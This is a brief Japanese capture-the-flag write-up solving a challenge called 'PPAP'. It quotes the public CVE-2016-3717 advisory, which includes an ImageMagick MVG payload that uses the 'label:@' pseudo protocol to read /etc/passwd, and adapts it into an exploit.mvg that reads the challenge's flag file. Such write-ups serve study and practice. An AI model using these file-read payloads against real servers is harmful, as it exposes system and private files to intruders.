PPAP
FLAGの場所はどうせflag.txtやろ!w
アクセスすると、「Access to /PPAP/flag.txt is forbidden」的なのが出るので、これで絶対パスがわかる
ページのタイトルにヒントがある:「ver 2016-3717」
5. CVE-2016-3717 - Local file read (independently reported by original
It is possible to get content of the files from the server by using
ImageMagick's 'label' pseudo protocol:
file_read.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@...c/passwd'
pop graphic-context
mvgとかいう謎フォーマットを適当にこしらえる
code:exploit.mvg
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/PPAP/flag.txt'
pop graphic-context